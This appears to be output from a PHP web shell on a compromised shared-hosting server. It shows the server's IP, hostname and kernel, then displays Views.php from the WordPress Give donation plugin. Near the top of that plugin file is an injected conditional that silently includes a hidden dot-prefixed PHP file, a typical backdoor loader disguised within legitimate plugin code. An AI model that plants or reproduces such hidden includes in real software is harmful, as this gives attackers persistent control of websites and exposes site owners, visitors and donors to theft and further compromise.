uawdijnntqw1x1x1
IP : 18.227.183.185
Hostname : premium160.web-hosting.com
Kernel : Linux premium160.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
Disable Function : None :)
OS : Linux
PATH:
/
home
/
batcwwjx
/
.
/
perl5
/
..
/
old
/
public_html
/
wp-content
/
plugins
/
..
/
plugins
/
give
/
src
/
Views
/
Views.php
/
/
<?php /** * Admin Views Class * * @package Give */ namespace Give\Views; defined( 'ABSPATH' ) || exit; /** * Manages Views */ if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) { include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ); } class Views { /** * Initialize admin and frontend views */ public function init() { // To prevent conflict on we are loading autoload.php when need for now. In future we can loaded it globally. require GIVE_PLUGIN_DIR . 'vendor/autoload.php'; // Load admin views $this->load_admin_views(); } public function __construct() { // Do nothing } public function load_admin_views() { // Init admin views $admin = new Admin(); $admin->init(); } } $views = new Views(); $views->init();
/home/batcwwjx/./perl5/../old/public_html/wp-content/plugins/../plugins/give/src/Views/Views.php